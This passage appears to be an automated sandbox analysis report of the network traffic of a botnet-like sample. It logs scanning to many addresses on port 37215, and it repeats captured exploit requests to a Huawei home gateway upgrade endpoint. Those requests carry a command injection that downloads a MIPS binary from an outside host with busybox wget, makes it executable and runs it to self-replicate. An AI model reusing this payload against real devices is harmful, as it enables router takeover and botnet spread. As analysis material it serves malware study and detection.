Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.148.193.21:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.248.7.216:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.6.248.59:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.177.123.121:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.135.135.11:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.208.225.177:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.113.96.230:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.136.20.229:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.107.220.144:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.184.107.110:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.156.69.230:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.85.39.83:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.85.50.147:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.80.36.116:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.234.175.200:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.6.56.210:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.22.51.214:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.29.126.135:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.82.164.137:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.55.16.248:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.146.207.95:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.157.121.79:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.107.114.224:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.52.175.25:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.171.61.185:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.172.197.34:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.118.203.124:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.180.234.28:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.92.198.47:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.103.77.196:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.252.32.64:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.155.200.53:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.197.213.95:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.158.66.74:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.32.166.87:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.83.94.92:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.233.196.131:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.46.177.21:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.101.45.72:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.159.74.20:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.122.217.146:37215

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 